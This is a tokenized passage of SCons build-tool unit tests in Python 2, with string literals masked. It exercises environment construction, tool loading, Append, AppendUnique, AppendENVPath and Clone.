'<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , normalize_path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' <EOL> ] <EOL> def normalize_if_path ( arg , np = normalize_path ) : <EOL> if arg not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return np ( str ( arg ) ) <EOL> return arg <EOL> flags = map ( normalize_if_path , flags ) <EOL> assert flags == expect , flags <EOL> def test_platform ( self ) : <EOL> """<STR_LIT>""" <EOL> class platform : <EOL> def __str__ ( self ) : return "<STR_LIT>" <EOL> def __call__ ( self , env ) : env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def tool ( env ) : <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assert env [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> env = self . TestEnvironment ( platform = platform ( ) , tools = [ tool ] ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> assert env [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> assert env [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> def test_Default_PLATFORM ( self ) : <EOL> """<STR_LIT>""" <EOL> class platform : <EOL> def __str__ ( self ) : return "<STR_LIT>" <EOL> def __call__ ( self , env ) : env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def tool ( env ) : <EOL> env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> assert env [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> import SCons . Defaults <EOL> save = SCons . Defaults . ConstructionEnvironment . copy ( ) <EOL> try : <EOL> import SCons . Defaults <EOL> SCons . Defaults . ConstructionEnvironment . update ( { <EOL> '<STR_LIT>' : platform ( ) , <EOL> } ) <EOL> env = self . TestEnvironment ( tools = [ tool ] ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> assert env [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> assert env [ '<STR_LIT>' ] == "<STR_LIT>" <EOL> finally : <EOL> SCons . Defaults . ConstructionEnvironment = save <EOL> def test_tools ( self ) : <EOL> """<STR_LIT>""" <EOL> def t1 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def t2 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def t3 ( env ) : <EOL> env [ '<STR_LIT>' ] = env [ '<STR_LIT>' ] <EOL> def t4 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> env = self . TestEnvironment ( tools = [ t1 , t2 , t3 ] , XYZ = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env <EOL> t4 ( env ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> env = self . TestEnvironment ( tools = [ ( '<STR_LIT>' , { '<STR_LIT:a>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> , '<STR_LIT:c>' : <NUM_LIT:3> } ) ] , <EOL> toolpath = [ test . workpath ( '<STR_LIT>' ) ] ) <EOL> assert env [ '<STR_LIT:a>' ] == <NUM_LIT:1> , env [ '<STR_LIT:a>' ] <EOL> assert env [ '<STR_LIT:b>' ] == <NUM_LIT:2> , env [ '<STR_LIT:b>' ] <EOL> assert env [ '<STR_LIT:c>' ] == <NUM_LIT:3> , env [ '<STR_LIT:c>' ] <EOL> def test_Default_TOOLS ( self ) : <EOL> """<STR_LIT>""" <EOL> def t5 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def t6 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def t7 ( env ) : <EOL> env [ '<STR_LIT>' ] = env [ '<STR_LIT>' ] <EOL> def t8 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> import SCons . Defaults <EOL> save = SCons . Defaults . ConstructionEnvironment . copy ( ) <EOL> try : <EOL> SCons . Defaults . ConstructionEnvironment . update ( { <EOL> '<STR_LIT>' : [ t5 , t6 , t7 ] , <EOL> } ) <EOL> env = Environment ( XYZ = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env <EOL> t8 ( env ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> finally : <EOL> SCons . Defaults . ConstructionEnvironment = save <EOL> def test_null_tools ( self ) : <EOL> """<STR_LIT>""" <EOL> def t1 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> def t2 ( env ) : <EOL> env [ '<STR_LIT>' ] = <NUM_LIT> <EOL> env = self . TestEnvironment ( tools = [ t1 , None , t2 ] , XYZ = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env <EOL> env = self . TestEnvironment ( tools = [ None ] , XYZ = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env <EOL> env = self . TestEnvironment ( tools = [ t1 , '<STR_LIT>' , t2 ] , XYZ = '<STR_LIT>' ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT> , env <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env <EOL> def test_concat ( self ) : <EOL> "<STR_LIT>" <EOL> e1 = self . TestEnvironment ( PRE = '<STR_LIT>' , SUF = '<STR_LIT>' , STR = '<STR_LIT>' , LIST = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> s = e1 . subst <EOL> x = s ( "<STR_LIT>" ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = s ( "<STR_LIT>" ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = s ( "<STR_LIT>" ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = s ( "<STR_LIT>" ) <EOL> assert x == '<STR_LIT>' , x <EOL> x = s ( "<STR_LIT>" ) <EOL> assert x == '<STR_LIT>' , x <EOL> def test_gvars ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' , ZZZ = '<STR_LIT:z>' ) <EOL> gvars = env . gvars ( ) <EOL> assert gvars [ '<STR_LIT>' ] == '<STR_LIT:x>' , gvars [ '<STR_LIT>' ] <EOL> assert gvars [ '<STR_LIT>' ] == '<STR_LIT:y>' , gvars [ '<STR_LIT>' ] <EOL> assert gvars [ '<STR_LIT>' ] == '<STR_LIT:z>' , gvars [ '<STR_LIT>' ] <EOL> def test__update ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( X = '<STR_LIT:x>' , Y = '<STR_LIT:y>' , Z = '<STR_LIT:z>' ) <EOL> assert env [ '<STR_LIT:X>' ] == '<STR_LIT:x>' , env [ '<STR_LIT:X>' ] <EOL> assert env [ '<STR_LIT:Y>' ] == '<STR_LIT:y>' , env [ '<STR_LIT:Y>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:z>' , env [ '<STR_LIT>' ] <EOL> env . _update ( { '<STR_LIT:X>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:t>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:s>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert env [ '<STR_LIT:X>' ] == '<STR_LIT>' , env [ '<STR_LIT:X>' ] <EOL> assert env [ '<STR_LIT:Y>' ] == '<STR_LIT:y>' , env [ '<STR_LIT:Y>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:t>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT:s>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> def test_Append ( self ) : <EOL> """<STR_LIT>""" <EOL> b1 = Environment ( ) [ '<STR_LIT>' ] <EOL> b2 = Environment ( ) [ '<STR_LIT>' ] <EOL> assert b1 == b2 , diff_dict ( b1 , b2 ) <EOL> import UserDict <EOL> UD = UserDict . UserDict <EOL> import UserList <EOL> UL = UserList . UserList <EOL> cases = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT:a>' , '<STR_LIT:3>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ ] , [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ ] ) , UL ( [ '<STR_LIT:a>' , '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ ] , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT>' , '<STR_LIT:I>' , '<STR_LIT:1>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , '<STR_LIT>' , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , [ '<STR_LIT>' ] , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , UL ( [ '<STR_LIT>' ] ) , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , { '<STR_LIT>' : <NUM_LIT:1> } , { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } , UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , '<STR_LIT>' , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , [ '<STR_LIT>' ] , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UL ( [ '<STR_LIT>' ] ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : None } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , { '<STR_LIT>' : <NUM_LIT:1> } , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> } ) , UD ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ ] , [ ] , <EOL> '<STR_LIT>' , UL ( [ ] ) , UL ( [ ] ) , <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ ] , '<STR_LIT>' , [ '<STR_LIT>' ] , <EOL> [ ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> [ ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ ] , '<STR_LIT>' , [ ] , <EOL> [ ] , [ ] , [ ] , <EOL> [ ] , UL ( [ ] ) , UL ( [ ] ) , <EOL> [ ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> [ ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , '<STR_LIT>' , [ '<STR_LIT:O>' , '<STR_LIT:1>' ] , <EOL> UL ( [ ] ) , [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , <EOL> UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , '<STR_LIT>' , UL ( [ ] ) , <EOL> UL ( [ ] ) , [ ] , UL ( [ ] ) , <EOL> UL ( [ ] ) , UL ( [ ] ) , UL ( [ ] ) , <EOL> UL ( [ ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , '<STR_LIT>' , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , [ ] , [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' ] , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , '<STR_LIT>' , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ ] , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ ] ) , UL ( [ '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , [ '<STR_LIT>' ] , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' ] ) , UL ( [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ] <EOL> env = Environment ( ) <EOL> failed = <NUM_LIT:0> <EOL> while cases : <EOL> input , append , expect = cases [ : <NUM_LIT:3> ] <EOL> env [ '<STR_LIT>' ] = copy . copy ( input ) <EOL> try : <EOL> env . Append ( XXX = append ) <EOL> except Exception , e : <EOL> if failed == <NUM_LIT:0> : print <EOL> print "<STR_LIT>" % ( repr ( input ) , repr ( append ) , e ) <EOL> failed = failed + <NUM_LIT:1> <EOL> else : <EOL> result = env [ '<STR_LIT>' ] <EOL> if result != expect : <EOL> if failed == <NUM_LIT:0> : print <EOL> print "<STR_LIT>" % ( repr ( input ) , repr ( append ) , repr ( result ) , repr ( expect ) ) <EOL> failed = failed + <NUM_LIT:1> <EOL> del cases [ : <NUM_LIT:3> ] <EOL> assert failed == <NUM_LIT:0> , "<STR_LIT>" % failed <EOL> env [ '<STR_LIT>' ] = UL ( [ '<STR_LIT:foo>' ] ) <EOL> env . Append ( UL = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , UL ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:foo>' , '<STR_LIT:b>' , '<STR_LIT:a>' , '<STR_LIT:r>' ] , result <EOL> env [ '<STR_LIT>' ] = CLVar ( [ '<STR_LIT:foo>' ] ) <EOL> env . Append ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:foo>' , '<STR_LIT:bar>' ] , result <EOL> class C : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> def __cmp__ ( self , other ) : <EOL> raise "<STR_LIT>" <EOL> ccc = C ( '<STR_LIT>' ) <EOL> env2 = self . TestEnvironment ( CCC1 = [ '<STR_LIT>' ] , CCC2 = ccc ) <EOL> env2 . Append ( CCC1 = ccc , CCC2 = [ '<STR_LIT>' ] ) <EOL> assert env2 [ '<STR_LIT>' ] [ <NUM_LIT:0> ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] [ <NUM_LIT:1> ] is ccc , env2 [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] [ <NUM_LIT:0> ] is ccc , env2 [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] [ <NUM_LIT:1> ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> env3 = self . TestEnvironment ( X = { '<STR_LIT>' : <NUM_LIT:7> } ) <EOL> env3 . Append ( X = { '<STR_LIT>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:9> } , Y = { '<STR_LIT>' : <NUM_LIT:10> } ) <EOL> assert env3 [ '<STR_LIT:X>' ] == { '<STR_LIT>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:9> } , env3 [ '<STR_LIT:X>' ] <EOL> assert env3 [ '<STR_LIT:Y>' ] == { '<STR_LIT>' : <NUM_LIT:10> } , env3 [ '<STR_LIT:Y>' ] <EOL> env4 = self . TestEnvironment ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:11> } ) <EOL> env4 . Append ( BUILDERS = { '<STR_LIT>' : <NUM_LIT:12> } ) <EOL> assert env4 [ '<STR_LIT>' ] == { '<STR_LIT>' : <NUM_LIT:11> , '<STR_LIT>' : <NUM_LIT:12> } , env4 [ '<STR_LIT>' ] <EOL> assert hasattr ( env4 , '<STR_LIT>' ) <EOL> assert hasattr ( env4 , '<STR_LIT>' ) <EOL> def test_AppendENVPath ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = self . TestEnvironment ( ENV = { '<STR_LIT>' : r'<STR_LIT>' } , <EOL> MYENV = { '<STR_LIT>' : r'<STR_LIT>' } ) <EOL> env1 . AppendENVPath ( '<STR_LIT>' , r'<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . AppendENVPath ( '<STR_LIT>' , r'<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . AppendENVPath ( '<STR_LIT>' , r'<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . AppendENVPath ( '<STR_LIT>' , r'<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . AppendENVPath ( '<STR_LIT>' , r'<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' , delete_existing = <NUM_LIT:0> ) <EOL> assert ( env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] == r'<STR_LIT>' ) <EOL> assert ( env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] == r'<STR_LIT>' ) <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . subdir ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> p = env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> env1 . AppendENVPath ( '<STR_LIT>' , '<STR_LIT>' , sep = '<STR_LIT:;>' ) <EOL> env1 . AppendENVPath ( '<STR_LIT>' , env1 . fs . Dir ( '<STR_LIT>' ) , sep = '<STR_LIT:;>' ) <EOL> assert env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] == p + '<STR_LIT>' , env1 [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> def test_AppendUnique ( self ) : <EOL> """<STR_LIT>""" <EOL> env = self . TestEnvironment ( AAA1 = '<STR_LIT>' , <EOL> AAA2 = '<STR_LIT>' , <EOL> AAA3 = '<STR_LIT>' , <EOL> AAA4 = '<STR_LIT>' , <EOL> AAA5 = '<STR_LIT>' , <EOL> BBB1 = [ '<STR_LIT>' ] , <EOL> BBB2 = [ '<STR_LIT>' ] , <EOL> BBB3 = [ '<STR_LIT>' ] , <EOL> BBB4 = [ '<STR_LIT>' ] , <EOL> BBB5 = [ '<STR_LIT>' ] , <EOL> CCC1 = '<STR_LIT>' , <EOL> CCC2 = '<STR_LIT>' , <EOL> DDD1 = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] ) <EOL> env . AppendUnique ( AAA1 = '<STR_LIT>' , <EOL> AAA2 = [ '<STR_LIT>' ] , <EOL> AAA3 = [ '<STR_LIT>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:c>' , '<STR_LIT:b>' , '<STR_LIT>' ] , <EOL> AAA4 = '<STR_LIT>' , <EOL> AAA5 = [ '<STR_LIT>' ] , <EOL> BBB1 = '<STR_LIT>' , <EOL> BBB2 = [ '<STR_LIT>' ] , <EOL> BBB3 = [ '<STR_LIT>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:c>' , '<STR_LIT>' ] , <EOL> BBB4 = '<STR_LIT>' , <EOL> BBB5 = [ '<STR_LIT>' ] , <EOL> CCC1 = '<STR_LIT>' , <EOL> CCC2 = [ '<STR_LIT>' ] , <EOL> DDD1 = '<STR_LIT:b>' ) <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT:c>' , '<STR_LIT:d>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] , env [ '<STR_LIT>' ] <EOL> env . AppendUnique ( DDD1 = '<STR_LIT:b>' , delete_existing = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:a>' , '<STR_LIT:c>' , '<STR_LIT:b>' ] , env [ '<STR_LIT>' ] <EOL> env . AppendUnique ( DDD1 = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] , delete_existing = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:c>' , '<STR_LIT:a>' , '<STR_LIT:b>' ] , env [ '<STR_LIT>' ] <EOL> env . AppendUnique ( DDD1 = [ '<STR_LIT:e>' , '<STR_LIT:f>' , '<STR_LIT:e>' ] , delete_existing = <NUM_LIT:1> ) <EOL> assert env [ '<STR_LIT>' ] == [ '<STR_LIT:c>' , '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:f>' , '<STR_LIT:e>' ] , env [ '<STR_LIT>' ] <EOL> env [ '<STR_LIT>' ] = CLVar ( [ ] ) <EOL> env . AppendUnique ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> if sys . version [ <NUM_LIT:0> ] == '<STR_LIT:1>' or sys . version [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> assert result == '<STR_LIT:bar>' , result <EOL> else : <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:bar>' ] , result <EOL> env [ '<STR_LIT>' ] = CLVar ( [ '<STR_LIT:abc>' ] ) <EOL> env . AppendUnique ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:abc>' , '<STR_LIT:bar>' ] , result <EOL> env [ '<STR_LIT>' ] = CLVar ( [ '<STR_LIT:bar>' ] ) <EOL> env . AppendUnique ( CLVar = '<STR_LIT:bar>' ) <EOL> result = env [ '<STR_LIT>' ] <EOL> assert isinstance ( result , CLVar ) , repr ( result ) <EOL> assert result == [ '<STR_LIT:bar>' ] , result <EOL> def test_Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> env1 = self . TestEnvironment ( XXX = '<STR_LIT:x>' , YYY = '<STR_LIT:y>' ) <EOL> env2 = env1 . Clone ( ) <EOL> env1copy = env1 . Clone ( ) <EOL> assert env1copy == env1copy <EOL> assert env2 == env2 <EOL> env2 . Replace ( YYY = '<STR_LIT>' ) <EOL> assert env2 == env2 <EOL> assert env1 != env2 <EOL> assert env1 == env1copy <EOL> env3 = env1 . Clone ( XXX = '<STR_LIT>' , ZZZ = '<STR_LIT>' ) <EOL> assert env3 == env3 <EOL> assert env3 . Dictionary ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert env3 . Dictionary ( '<STR_LIT>' ) == '<STR_LIT:y>' <EOL> assert env3 . Dictionary ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert env1 == env1copy 